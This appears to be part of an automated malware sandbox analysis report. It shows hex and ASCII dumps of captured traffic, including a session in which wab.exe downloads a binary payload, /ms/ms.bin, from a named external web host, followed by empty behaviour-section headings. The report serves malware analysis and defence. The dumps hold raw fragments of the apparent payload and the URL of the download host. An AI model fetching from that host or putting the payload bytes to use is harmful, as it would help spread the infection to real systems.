                                                                              2024-12-19 11:37:36 UTC16384INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 4a 36 34 33 55 74 34 6a 52 33 38 63 36 62 77 68 38 46 2f 76 30 41 58 6a 58 7a 4c 4e 52 79 47 36 36 57 58 53 76 47 43 41 57 58 79 76 42 4b 39 4c 67 45 75 31 6c 77 41 37 75 62 53 4e 38 49 6d 64 6a 68 61 66 30 7a 54 64 79 35 31 51 4e 50 6d 32 39 66 52 43 31 4a 53 79 74 49 45 37 44 36 79 39 35 2f 43 2f 49 76 77 6b 71 54 54 76 4f 63 54 4a 6a 45 55 6c 74 75 31 53 6a 33 50 31 37 78 2f 53 50 41 42 73 64 6b 6e 6b 6c 70 5a 45 51 7a 4e 66 55 59 35 77 61 38 4a 76 4a 55 54 54 32 76 42 48 79 58 64 51 31 66 58 6d 56 58 36 32 42 31 61 41 4f 69 65 78 51 2b 6d 77 76 68 46 64 49 6c 65 30 35 43 6f 6b 78 4a 33 77 75 41 49 4c 35 76 50 32 30 43
                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAJ643Ut4jR38c6bwh8F/v0AXjXzLNRyG66WXSvGCAWXyvBK9LgEu1lwA7ubSN8Imdjhaf0zTdy51QNPm29fRC1JSytIE7D6y95/C/IvwkqTTvOcTJjEUltu1Sj3P17x/SPABsdknklpZEQzNfUY5wa8JvJUTT2vBHyXdQ1fXmVX62B1aAOiexQ+mwvhFdIle05CokxJ3wuAIL5vP20C
                                                                              2024-12-19 11:37:36 UTC16384INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 42 64 55 33 4b 72 55 6c 4a
                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABdU3KrUlJ
                                                                              2024-12-19 11:37:36 UTC16384INData Raw: 7a 56 47 34 77 4d 6b 45 75 57 56 34 59 2f 44 42 48 2f 48 48 48 59 5a 4e 61 41 42 65 39 79 4b 63 7a 7a 37 6d 4d 54 76 77 30 46 61 70 78 77 7a 50 46 57 67 52 46 36 38 69 6a 59 5a 6d 35 74 4e 77 41 4e 79 58 6c 44 4b 4b 30 30 44 55 2f 2b 30 2b 62 47 75 61 77 69 46 49 64 52 45 43 6c 64 65 64 43 31 4a 53 2b 36 63 6c 33 73 50 7a 74 39 50 32 31 46 4e 53 51 38 74 46 67 4f 79 4c 35 34 78 43 43 6c 4c 2f 4f 43 6f 41 30 2f 62 55 55 31 4a 44 33 5a 50 58 4d 6f 36 49 45 62 79 48 6a 46 4e 44 43 69 65 6e 4a 59 2b 43 45 59 51 4a 32 42 42 6d 62 39 4e 35 39 35 62 69 53 38 49 35 2f 30 38 35 33 4e 61 49 77 69 46 79 30 46 6e 38 31 71 53 45 6a 33 68 51 51 77 71 6b 4c 6a 47 34 30 2b 64 70 43 46 4a 53 6d 49 73 35 62 73 4b 2f 65 46 42 44 43 71 71 73 51 75 58 54 31 32 6b 49 55 6c 4a
                                                                              Data Ascii: zVG4wMkEuWV4Y/DBH/HHHYZNaABe9yKczz7mMTvw0FapxwzPFWgRF68ijYZm5tNwANyXlDKK00DU/+0+bGuawiFIdRECldedC1JS+6cl3sPzt9P21FNSQ8tFgOyL54xCClL/OCoA0/bUU1JD3ZPXMo6IEbyHjFNDCienJY+CEYQJ2BBmb9N595biS8I5/0853NaIwiFy0Fn81qSEj3hQQwqkLjG40+dpCFJSmIs5bsK/eFBDCqqsQuXT12kIUlJ
                                                                              2024-12-19 11:37:36 UTC16384INData Raw: 49 62 4e 53 51 77 58 57 46 50 50 31 72 64 4e 7a 47 55 71 77 58 34 74 69 49 64 47 70 5a 44 52 36 79 57 71 61 77 69 49 5a 6a 42 4d 72 61 71 79 45 6a 36 6c 54 51 77 72 77 4e 4d 77 50 61 72 58 47 77 74 50 6e 75 41 74 53 55 6b 79 37 53 41 7a 47 30 4e 50 6e 75 41 74 53 55 72 35 65 44 47 45 6c 4d 34 6a 54 76 4a 31 47 6c 6c 4b 4c 2f 36 6c 43 43 6c 49 66 77 4d 45 36 31 34 49 7a 6d 52 4b 38 68 36 6c 54 51 77 6f 6e 70 53 57 4c 71 45 31 31 53 71 57 51 46 47 31 31 43 59 51 4b 37 4c 76 56 54 64 4e 53 6c 32 76 37 72 38 49 36 45 77 30 68 31 6a 52 72 69 34 74 69 6c 70 67 62 53 39 4f 38 76 64 74 73 56 75 46 36 4c 48 5a 44 71 77 39 51 71 68 33 68 58 59 2f 2f 63 4d 37 31 59 4f 69 4d 6f 58 51 73 64 6b 4f 72 44 31 43 71 48 65 46 64 6a 2f 39 77 7a 76 56 67 36 49 79 68 64 4e 76
                                                                              Data Ascii: IbNSQwXWFPP1rdNzGUqwX4tiIdGpZDR6yWqawiIZjBMraqyEj6lTQwrwNMwParXGwtPnuAtSUky7SAzG0NPnuAtSUr5eDGElM4jTvJ1GllKL/6lCClIfwME614IzmRK8h6lTQwonpSWLqE11SqWQFG11CYQK7LvVTdNSl2v7r8I6Ew0h1jRri4tilpgbS9O8vdtsVuF6LHZDqw9Qqh3hXY//cM71YOiMoXQsdkOrD1CqHeFdj/9wzvVg6IyhdNv
                                                                              2024-12-19 11:37:36 UTC16384INData Raw: 37 74 57 44 76 5a 6a 4d 48 78 42 5a 59 2b 31 48 2f 58 78 2b 47 6f 74 57 64 70 74 39 2b 54 5a 4d 43 30 52 32 51 77 70 53 55 6b 4d 4b 55 6c 4a 44 43 6c 4a 53 51 38 69 53 67 4b 4e 31 2b 62 35 5a 70 56 55 72 30 56 75 33 70 53 6d 4c 66 6e 62 78 57 56 56 46 45 72 4f 5a 31 4f 2f 33 30 37 74 63 41 38 32 64 77 76 75 4c 78 71 79 7a 30 35 4e 6d 73 7a 4d 2f 77 76 76 49 38 51 63 50 42 4d 37 4b 37 46 74 63 33 6f 36 44 49 6b 78 47 56 6f 64 33 47 34 38 6d 77 73 51 2b 57 66 47 65 69 32 47 45 31 4f 64 6e 47 62 55 32 4f 53 7a 58 58 56 71 53 6a 47 42 4c 51 31 4d 72 31 70 4e 55 61 34 45 61 69 33 35 32 66 46 4b 79 69 49 2f 5a 55 44 65 41 4e 4d 46 74 45 74 66 32 35 75 4c 54 6b 34 42 39 7a 43 39 65 59 6a 4a 54 42 34 32 4b 67 53 48 6d 38 39 38 46 5a 66 4c 71 45 65 79 44 33 39 46
                                                                              Data Ascii: 7tWDvZjMHxBZY+1H/Xx+GotWdpt9+TZMC0R2QwpSUkMKUlJDClJSQ8iSgKN1+b5ZpVUr0Vu3pSmLfnbxWVVFErOZ1O/307tcA82dwvuLxqyz05NmszM/wvvI8QcPBM7K7Ftc3o6DIkxGVod3G48mwsQ+WfGei2GE1OdnGbU2OSzXXVqSjGBLQ1Mr1pNUa4Eai352fFKyiI/ZUDeANMFtEtf25uLTk4B9zC9eYjJTB42KgSHm898FZfLqEeyD39F
                                                                              2024-12-19 11:37:36 UTC16384INData Raw: 43 6c 4a 53 51 77 70 53 55 6b 50 30 78 2b 77 4e 63 42 6f 58 55 51 58 6d 62 37 33 6a 31 6b 74 41 43 70 35 56 48 64 4a 32 38 71 71 6a 71 4f 45 6e 71 38 43 74 77 79 4c 5a 6c 39 48 64 51 6c 4c 34 65 31 2b 4f 6c 4e 55 73 55 73 38 50 6c 30 35 74 57 74 54 61 73 41 57 56 59 55 4d 4b 55 6c 4a 44 43 6c 4a 53 51 77 70 53 55 6b 50 33 62 58 78 4f 44 35 4c 65 7a 6a 69 52 31 78 55 77 43 41 58 38 70 6b 4e 76 77 49 75 39 50 43 75 78 6f 64 4f 30 4e 50 72 54 7a 46 6a 4f 32 36 45 4c 61 4d 2f 47 38 69 64 7a 68 49 69 77 4a 46 68 74 56 41 50 69 35 37 75 65 62 34 31 32 6c 39 52 58 57 42 51 30 6f 5a 53 72 36 49 41 31 6f 51 67 6c 6d 6d 53 76 7a 77 59 64 77 2f 46 62 43 43 57 50 69 77 32 50 61 72 63 50 76 6c 5a 42 49 55 34 35 54 43 68 5a 35 66 72 2f 46 4d 72 63 6f 47 74 53 4b 74 58
                                                                              Data Ascii: ClJSQwpSUkP0x+wNcBoXUQXmb73j1ktACp5VHdJ28qqjqOEnq8CtwyLZl9HdQlL4e1+OlNUsUs8Pl05tWtTasAWVYUMKUlJDClJSQwpSUkP3bXxOD5LezjiR1xUwCAX8pkNvwIu9PCuxodO0NPrTzFjO26ELaM/G8idzhIiwJFhtVAPi57ueb412l9RXWBQ0oZSr6IA1oQglmmSvzwYdw/FbCCWPiw2ParcPvlZBIU45TChZ5fr/FMrcoGtSKtX
                                                                              2024-12-19 11:37:36 UTC16384INData Raw: 64 2b 45 46 2f 46 4f 63 4d 62 43 4c 70 52 4b 4a 44 69 48 54 68 47 37 73 67 53 53 4c 6c 63 39 7a 6e 47 2f 54 72 42 43 67 67 6d 5a 62 7a 74 75 69 41 32 76 50 78 73 30 70 57 51 33 68 63 6a 55 41 69 63 46 69 49 30 6a 77 79 4a 44 30 4d 35 54 67 51 4e 6f 4e 4d 4e 30 4f 39 76 5a 44 63 6d 37 4a 46 63 47 36 72 44 71 51 61 70 4a 54 2b 35 6d 6c 47 31 34 4e 77 69 56 6e 75 56 79 67 58 5a 56 39 49 6c 4a 53 51 77 70 53 55 6b 4d 4b 55 6c 4a 44 43 6c 4b 5a 49 33 47 35 75 48 44 53 70 68 52 4e 30 4b 36 63 47 6a 73 65 70 67 49 4f 59 6d 6c 64 62 70 35 4a 49 6c 79 44 6f 32 6c 6b 6d 32 46 4e 7a 51 62 38 36 55 57 33 67 38 68 56 2b 4d 77 2b 49 45 2f 39 56 36 6d 59 55 69 6a 66 32 78 4c 57 6c 77 77 77 59 70 79 68 2b 57 78 4a 72 61 35 6c 32 33 6f 2f 68 45 31 57 69 42 75 6f 59 74 4d
                                                                              Data Ascii: d+EF/FOcMbCLpRKJDiHThG7sgSSLlc9znG/TrBCggmZbztuiA2vPxs0pWQ3hcjUAicFiI0jwyJD0M5TgQNoNMN0O9vZDcm7JFcG6rDqQapJT+5mlG14NwiVnuVygXZV9IlJSQwpSUkMKUlJDClKZI3G5uHDSphRN0K6cGjsepgIOYmldbp5JIlyDo2lkm2FNzQb86UW3g8hV+Mw+IE/9V6mYUijf2xLWlwwwYpyh+WxJra5l23o/hE1WiBuoYtM
                                                                              2024-12-19 11:37:36 UTC16384INData Raw: 4d 42 45 6e 57 48 49 63 37 59 6e 75 52 44 46 6e 34 76 64 2b 51 4a 38 6b 49 32 54 62 53 32 67 6a 70 4c 32 33 41 6a 76 70 4f 52 75 4a 30 65 70 44 43 6c 4a 46 6a 78 41 38 7a 46 34 65 69 6e 2f 73 57 55 69 67 37 30 57 65 6b 4b 7a 4e 6a 31 63 43 53 52 6d 35 39 49 66 6d 44 79 44 4e 52 61 30 38 53 77 65 55 6a 7a 38 51 71 54 41 38 79 69 6c 72 53 58 68 6a 56 73 30 53 36 2f 76 30 62 52 6a 57 67 39 37 2b 4f 76 31 66 33 54 79 4a 30 65 70 44 43 6c 4a 57 54 41 74 43 77 55 4d 4b 55 6c 4a 44 43 6c 4a 53 51 77 70 53 55 6b 50 4c 46 49 62 78 70 35 6e 78 58 41 4b 41 6e 4e 6f 49 78 4f 74 4f 4f 6c 32 56 63 67 4a 53 55 6b 4d 4b 55 6c 4a 44 43 6c 4a 53 51 77 70 53 68 6a 6d 2f 78 62 41 56 4e 65 41 2b 6d 45 2f 58 75 77 2f 64 51 55 73 76 52 32 77 53 4e 53 65 53 63 42 68 65 4a 78 46
                                                                              Data Ascii: MBEnWHIc7YnuRDFn4vd+QJ8kI2TbS2gjpL23AjvpORuJ0epDClJFjxA8zF4ein/sWUig70WekKzNj1cCSRm59IfmDyDNRa08SweUjz8QqTA8yilrSXhjVs0S6/v0bRjWg97+Ov1f3TyJ0epDClJWTAtCwUMKUlJDClJSQwpSUkPLFIbxp5nxXAKAnNoIxOtOOl2VcgJSUkMKUlJDClJSQwpShjm/xbAVNeA+mE/Xuw/dQUsvR2wSNSeScBheJxF


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              2192.168.2.749781103.120.177.1504436344C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-12-19 11:38:03 UTC181OUTGET /ms/ms.bin HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                              Host: www.royalengineeringllc.com
                                                                              Cache-Control: no-cache
                                                                              2024-12-19 11:38:03 UTC223INHTTP/1.1 200 OK
                                                                              Date: Thu, 19 Dec 2024 11:38:01 GMT
                                                                              Server: Apache
                                                                              Last-Modified: Thu, 25 Jan 2024 11:51:24 GMT
                                                                              Accept-Ranges: bytes
                                                                              Content-Length: 585792
                                                                              Connection: close
                                                                              Content-Type: application/octet-stream
                                                                              2024-12-19 11:38:03 UTC7969INData Raw: ce 01 2f ff e2 e6 32 e2 80 ba 1e f1 64 76 d6 e1 39 82 cd 6c 01 44 c8 d6 f4 73 2f 51 24 0c c5 a9 67 0d 83 fa e2 c5 50 2a 4d 5e 89 78 8b 98 d6 c6 d1 f0 b1 b3 5a a5 e3 43 08 f5 e8 5a de 5c 6e ae 9c bb c3 14 35 12 c7 67 a1 95 db e6 95 21 df f7 ac 21 39 8f 16 ad af 09 74 71 46 41 7c d3 e5 4d ee fe 67 ca 30 57 75 ed 3b 37 82 02 cd 1d fd 41 df 10 af ae 99 59 7e 2f 2f a9 d3 b8 fe 77 9c 26 c2 99 8f 17 cd a6 e1 ac ad 34 dc a7 0d 41 c6 20 87 89 fc 58 42 d9 7d 4c 73 9c d0 ba 9b 05 65 d7 a4 6a a8 37 74 5a d9 87 ec fe 8b 14 51 5f f4 9d ce 77 bd 8f b5 1a 47 5a 45 ce 97 77 6c 85 5b a3 c2 c6 98 0b ae 47 42 df d1 86 5c 5f 3a 2b 0a 3e fe 82 b1 07 98 4b 8e 7e 8b d5 ba a2 18 a0 0e 0a 14 c7 77 e5 ec 6c b4 92 8b 57 cd 14 18 b4 0a 6a 9d 76 cb 20 0e 5f 08 dc 2d d4 bf fa 0f af 33
                                                                              Data Ascii: /2dv9lDs/Q$gP*M^xZCZ\n5g!!9tqFA|Mg0Wu;7AY~//w&4A XB}Lsej7tZQ_wGZEwl[GB\_:+>K~wlWjv _-3
                                                                              2024-12-19 11:38:03 UTC8000INData Raw: aa 7e a6 60 ca bf 57 0d be 7b 58 d3 10 19 ef 8f 2a 05 40 8d 0f d0 ae 4b 89 8a 5f 6c 51 41 a7 8b a4 ca 63 31 8b b3 f4 ed b3 8b 8f bb 52 b6 16 ba e1 f7 b8 c4 32 77 10 24 45 ab 94 3e d6 c4 d4 77 38 eb a7 58 40 07 98 85 48 0c ce ee ee b4 2f 69 7a e6 f7 97 eb 2b 36 fd 3e 64 44 6a 30 39 f2 cb 37 07 8e 25 da 54 ac 80 0d 32 f3 48 99 df 8f df 4b 61 08 6f dc 6d f4 60 cf 2b 7d 45 a2 4c 61 79 b6 e2 42 73 ea 8e 39 1a bd c2 cc 00 65 72 7e 3f 7c 00 41 be dd e3 4d 7d aa 5a ff 1f e5 8d 3c 92 03 e6 7a 7d e1 80 42 71 7f 1d 81 18 af 70 4d 68 b2 fd a8 dd df 11 c2 6a 48 fc d9 e9 0a b9 25 50 64 b8 b8 4e 82 6c 6c 4b 2d bd 2c 4a 04 3d 97 47 a0 03 a8 84 de 75 a4 54 e5 da 5d 10 b8 e8 10 08 5b d5 dc 02 4c b0 2d dd d1 6d a5 81 81 36 f9 31 b1 df 1d 6c 45 19 f5 98 5e 1c f4 8b e9 c5 be
                                                                              Data Ascii: ~`W{X*@K_lQAc1R2w$E>w8X@H/iz+6>dDj097%T2HKaom`+}ELayBs9er~?|AM}Z<z}BqpMhjH%PdNllK-,J=GuT][L-m61lE^
                                                                              2024-12-19 11:38:03 UTC8000INData Raw: ed 1d ab 71 06 1e f4 9d ff fb 8f 7b aa 84 32 c2 68 61 c5 71 ab f6 24 cf ee 63 ee a7 0b fe a3 7c 75 b7 17 19 0e ab 5a 1e a0 64 ab ab 1a 8d ff 86 4c 9c b3 dd 3b 35 a1 95 47 f1 ec 25 3a 44 6a ba 10 a3 a5 6f fb 8a 34 b3 0d 28 1d a0 3d 51 23 1e 6c e0 ac 9a b7 a9 db df 21 59 db f8 d8 b4 63 ec 63 74 10 7f b6 1b 8d 91 06 82 54 06 6e be ca 2e 93 ca 3c a1 6a f5 48 05 4a 1d 66 a9 87 75 b2 8c bd a3 21 80 2b c9 ca ff 79 99 0d c3 8d 64 48 cf 5f 6e d4 fb 2c 9a a6 c0 8b bf 2e d2 03 61 0d 96 df eb 7c 48 b3 b6 7e 16 76 2c 87 44 e1 99 05 d8 0c 81 f3 c3 76 57 cb ab 9c 4f db 43 03 b3 b0 3c 7b 73 33 6b 47 70 4a 08 0e 92 c2 3c 25 78 e7 a6 5f 0a f7 7a 6c d7 cc 65 96 bc 87 b9 24 f6 b1 ac 4d c8 c7 e3 d5 56 c0 85 23 1e 3d 46 2b fa d6 18 ac 07 cc d7 a7 21 cf a2 e5 d5 69 ae dd 1f 7c
                                                                              Data Ascii: q{2haq$c|uZdL;5G%:Djo4(=Q#l!YcctTn.<jHJfu!+ydH_n,.a|H~v,DvWOC<{s3kGpJ<%x_zle$MV#=F+!i|
                                                                              2024-12-19 11:38:03 UTC8000INData Raw: 2b 2f 4a 1d f1 06 10 9a ef e0 8f 9c 50 d3 1f 46 32 e2 2e 89 8d ea 34 f8 3f d2 7f f5 0e 74 bb 89 05 cb 7e 54 fe 7c c5 44 9f 5a b5 0a 82 bf fe 0e f4 4c e0 98 16 c3 8b 18 25 9a c5 7a 16 22 f7 7b c3 a8 ff 39 70 2d b6 1d fb af 5b 88 5b f4 8f a2 52 eb 20 f6 b6 79 78 76 6f 24 d3 73 42 17 1f ae ce 99 de be e3 5b 9e db 3f e9 1a a0 fc 66 44 f5 d5 86 47 74 6b fa d6 7e 75 0a 55 5b f8 c3 15 4a cc fc 8e 7c 18 e8 a1 7c cd 70 9e 29 a1 27 76 6e 72 b9 b8 21 55 03 08 a3 36 5b b0 cf 37 a6 f4 70 48 98 53 48 e9 91 24 29 8e 7a e1 5c cf 2c 0a 10 cb 30 1c 39 f2 8b 96 ee 3a cb a1 75 71 4a 68 18 26 85 78 b3 b4 32 f7 22 5c 80 98 c3 36 39 62 ac 96 4e 8f 3a ee 34 14 ab 66 e2 06 fa d3 58 24 23 4c 9f bf ce 59 46 16 5b 4b 01 00 2e 2c af 38 93 b3 fa df d7 33 38 38 b7 8f 21 46 f5 ef 35 8f
                                                                              Data Ascii: +/JPF2.4?t~T|DZL%z"{9p-[[R yxvo$sB[?fDGtk~uU[J||p)'vnr!U6[7pHSH$)z\,09:uqJh&x2"\69bN:4fX$#LYF[K.,8388!F5
                                                                              2024-12-19 11:38:03 UTC8000INData Raw: 08 25 a1 7f e6 aa ce 3c 5d 44 8b 23 84 2c b0 70 b6 d4 25 b6 5d ec b3 35 e9 49 aa 77 8c 57 c2 1f ab 6e 26 f5 5e 8a fb 74 94 54 4c 5d 66 b3 4b 68 75 4b 0b 61 51 13 1c 71 c3 be c8 a8 91 5e 0e 35 45 0e 94 7f 7d 9a 48 49 f7 53 2a ef 79 dd 3f 2b da 67 e3 a3 64 17 62 55 29 89 6a ec ee b1 d3 a8 45 32 e8 d4 bf b8 ee ee e8 ee d1 bf b0 b1 ce b7 50 fe 22 06 d4 cc 61 72 21 6e f8 02 26 4e 09 2b 29 a9 08 8b 10 de 39 c8 23 c2 89 76 e4 93 28 f2 68 a1 cb 42 60 38 3f b4 90 85 31 00 6b 63 42 c3 ca 0f 13 11 aa 49 91 1c 18 27 2f 38 f0 8e 33 f8 c4 6f da c1 44 6a b8 00 9a 0e f9 d7 5d b5 bd b6 a8 14 31 e5 0b d8 51 be 85 97 04 35 26 c0 f7 65 e0 ea 4d 93 8f 22 a7 d0 a4 db e6 62 c1 9d 60 c8 2e c5 be bb f0 2b a5 2b fa db a4 9a 66 01 f5 70 70 81 76 0d fa 93 4e f1 0a 94 59 3f 49 96 e4
                                                                              Data Ascii: %<]D#,p%]5IwWn&^tTL]fKhuKaQq^5E}HIS*y?+gdbU)jE2P"ar!n&N+)9#v(hB`8?1kcBI'/83oDj]1Q5&eM"b`.++fppvNY?I
                                                                              2024-12-19 11:38:04 UTC8000INData Raw: 80 fd 7e 2d ff e4 36 3a 00 74 57 63 ea 3e cf d5 56 f1 48 32 5d b6 63 ed 62 37 bb d0 a0 6c ae 31 3a 1d 31 ae da 51 2c 9c e5 8a e2 12 95 65 5c bc 38 0d 5b 7a c9 39 6c c2 e6 1b 56 e3 59 58 87 f1 2f 42 c4 f6 66 a8 c9 5d d7 c0 fc 49 10 53 2b e6 49 21 2f b2 39 05 91 5c 9f a0 44 d8 9d ce 1d ac 0d 76 9c 84 d5 44 b8 e5 b5 c4 e5 39 12 0f bc b0 c7 af c2 f3 d2 dd 8d 8c 8b 1c 71 52 21 bb e4 69 1b a1 7f e0 0a 08 f5 5c 34 91 67 44 c0 ba 32 75 10 e2 08 ff 21 be f3 d5 a9 bf 2d 15 24 42 10 68 09 a6 c2 87 5b e8 d3 51 d3 49 ac 19 fb 4d 6d 36 30 19 de d3 2e de b4 7c 5b ce ed f5 e8 e1 af d4 41 51 f5 19 1e 8a 8a 6e 53 6e 2a 4a 15 ab 2a 77 82 e5 e0 00 c8 d0 cf 6c 99 af 66 2a 5b 52 c2 c4 35 ee 23 76 a2 cd 8b e4 8c 27 fe 4f 2e 34 d2 5c d9 e7 4e 36 94 15 f3 26 2d 3c 10 a7 d4 88 8c
                                                                              Data Ascii: ~-6:tWc>VH2]cb7l1:1Q,e\8[z9lVYX/Bf]IS+I!/9\DvD9qR!i\4gD2u!-$Bh[QIMm60.|[AQnSn*J*wlf*[R5#v'O.4\N6&-<
                                                                              2024-12-19 11:38:04 UTC8000INData Raw: 45 90 9e 41 d4 03 e5 6d 35 03 64 39 5b cb 82 b4 57 24 ef 84 93 7f 6d b2 ab 1e bb 77 1f 91 e1 64 85 cd 2c 0e fb a8 82 f8 23 3c 85 6d 17 f2 34 88 ab f2 80 56 d8 82 72 07 81 a9 d4 f6 c5 96 5a 99 db 2e ae 51 7a 9d 61 95 ac 16 54 97 16 b9 8c 20 3b 9e e3 fd 5a f3 7a 25 21 ce ea b4 f4 9a 68 1f 1d a5 ce b7 86 b8 dc 63 ec 33 ce 43 98 a9 32 88 a0 e8 48 31 da 0e b0 41 dd 73 2a d1 39 ee 3b 4f 72 1b a4 1b 64 02 5f b9 66 de 31 d0 ad 83 c3 f5 36 09 30 63 89 30 a5 34 d5 ea 5b fc cb 7f b8 7d f7 47 ea 23 82 04 32 9b 8d 24 13 3a 33 02 db 8b 28 82 d7 0e dc 62 2f 4d 3e 77 26 c8 62 4f b7 f5 28 c4 73 40 62 73 5e 71 67 29 c0 82 73 0e a7 b0 e8 95 6d 55 d0 e6 b6 49 2f 31 8e 8e 5f bd 6a 57 81 5e ae 83 89 10 e4 f0 f7 d7 89 5f 08 ba e7 19 ed 0e 57 74 5a 7d e7 58 d8 fe 36 1c a0 65 c2
                                                                              Data Ascii: EAm5d9[W$mwd,#<m4VrZ.QzaT ;Zz%!hc3C2H1As*9;Ord_f160c04[}G#2$:3(b/M>w&bO(s@bs^qg)smUI/1_jW^_WtZ}X6e
                                                                              2024-12-19 11:38:04 UTC8000INData Raw: a2 e7 e7 23 cf e0 00 f0 fb 3d f4 54 3f 9e 14 18 7b 09 47 01 c2 95 05 1a ae 29 46 85 98 ab db 3a f2 46 53 1a 54 8f 99 9e a1 d0 a7 01 ec e5 45 84 24 10 7c be 12 02 10 36 e3 10 a1 47 70 81 62 39 65 f4 3e ea dd a2 e5 20 49 ec bd 9c cd e1 05 fc 68 85 04 e6 d3 d3 7f 4b c1 9a 94 94 04 a5 77 3b 7f 05 51 19 67 0e 41 b2 81 ad 7c 24 2d af f0 68 55 29 a0 b0 f0 5f 81 62 b4 d5 b3 bd 8e 5f e5 48 d5 5e ff 11 cc b2 0c 37 79 f7 7d 9e f8 ed 4b 55 e6 bf 56 42 fe bd 11 ee de b1 f7 15 55 86 5d 87 d6 fd 4a 3b 87 e8 bc e3 b3 48 ef 0b f3 39 ef a2 f0 84 1a 5a 07 91 af 05 18 e4 12 2b c0 d8 8c dc 26 69 98 14 55 69 f2 be 14 a0 4f 94 29 8d 2c fd 6b e7 2b 71 ff 2c e7 e4 a9 0f b2 f1 e3 ed 98 ed 49 93 b5 d7 dd d0 e5 ef 3a 59 c6 ae 3b d7 8e e5 8c 47 eb 20 57 31 46 9e b6 d5 18 76 f9 d1 18
                                                                              Data Ascii: #=T?{G)F:FSTE$|6Gpb9e> IhKw;QgA|$-hU)_b_H^7y}KUVBU]J;H9Z+&iUiO),k+q,I:Y;G W1Fv
                                                                              2024-12-19 11:38:04 UTC8000INData Raw: d2 e7 12 1d 5a 3f 2c 69 5a fc 32 67 15 52 e8 96 be 4d e9 02 6b 9b 8e f1 f7 66 5b 60 92 48 ee fb a8 0c 20 3d 5e 1a 1a 7a 8c fd ea f2 fc 47 59 0e ee 5a 55 5c 88 e1 cd e3 c1 24 9e 54 83 ad 20 e0 db 96 47 16 3e 74 71 45 c3 53 7c 43 5a 4f 7f f4 2b d6 92 de ad d4 88 16 b1 dc f3 ff 27 f9 c8 0d 58 a6 0b 9f a3 b9 51 59 59 5f 0c 74 23 cd 83 8e cf 71 0a c9 c8 31 b0 4e 78 07 1d 60 27 ab 64 60 24 fc c6 c9 e6 7f f2 41 0f b0 93 fb 11 d0 89 9f ba 05 c2 a6 94 40 29 fe da 0b 22 5d 2c 2b 19 23 44 9f 7f 58 a8 5c 86 7a d8 e5 c2 88 e4 05 e9 20 e7 38 7e c5 cf 79 1e 71 af c0 c0 77 82 b6 fd ef 7e d9 d1 95 05 20 e7 6f d4 97 de 0e 24 c2 1e f7 a2 d0 b8 d3 d3 3a 7e b2 4a 14 9b c6 82 b2 70 fe 13 cc fc 61 08 16 f2 15 ac 61 14 69 2f f0 f5 50 eb 63 a2 d5 9d 42 fc b4 d5 b3 1d 48 29 d7 5f
                                                                              Data Ascii: Z?,iZ2gRMkf[`H =^zGYZU\$T G>tqES|CZO+'XQYY_t#q1Nx`'d`$A@)"],+#DX\z 8~yqw~ o$:~Jpaai/PcBH)_
                                                                              2024-12-19 11:38:04 UTC8000INData Raw: 8b 97 b1 71 32 55 bc 40 42 77 57 e1 06 ea 53 e9 ee f2 2d e3 0b 8c f9 37 1e 40 f1 bf f8 05 69 39 2b 69 37 c7 99 d2 e1 83 77 0e e6 a6 68 2d d8 2c b6 79 a4 8a e7 a7 c0 fa b2 80 9b 14 b5 df 4a 2b cc 20 dc d1 7a 08 9f fd 1b b4 08 33 27 d1 e1 53 14 36 12 c7 67 a5 95 db e6 6a de df f7 14 21 39 8f 16 ad af 09 34 71 46 41 7c d3 e5 4d ee fe 67 ca 30 57 75 ed 3b 37 82 02 cd 1d fd 41 df 10 af ae 99 59 7e 2f 2f a9 d3 b8 16 77 9c 26 cc 86 35 19 cd 12 e8 61 8c 8c dd eb c0 60 92 48 ee fa dc 28 30 b6 1a 3e 12 f1 f0 d9 fa 6b 0b b8 d0 4a ca 52 54 28 ac e9 cc 97 e5 34 15 10 a7 bd a3 18 d9 ea 9b 17 4a 50 61 ce 97 77 6c 85 5b a3 b9 f0 1a 9d 91 10 ae 1a ee d1 b0 9a 05 7c e6 fb ae ca 59 c2 a5 1c 62 bb 37 9e 58 67 24 f7 e2 cf 44 8f 91 20 d8 3b 58 57 77 0f 7c d1 2c e3 e6 af a2 21
                                                                              Data Ascii: q2U@BwWS-7@i9+i7wh-,yJ+ z3'S6gj!94qFA|Mg0Wu;7AY~//w&5a`H(0>kJRT(4JPawl[|Yb7Xg$D ;XWw|,!


                                                                              Statistics

                                                                              CPU Usage

                                                                              Click to jump to process

                                                                              Memory Usage

                                                                              Click to jump to process

                                                                              High Level Behavior Distribution

                                                                              Click to dive into process behavior distribution

                                                                              Behavior

                                                                              Click to jump to process

                                                                              System Behavior

                                                                              General

                                                                              Target ID:1
                                                                              Start time:06:37:23
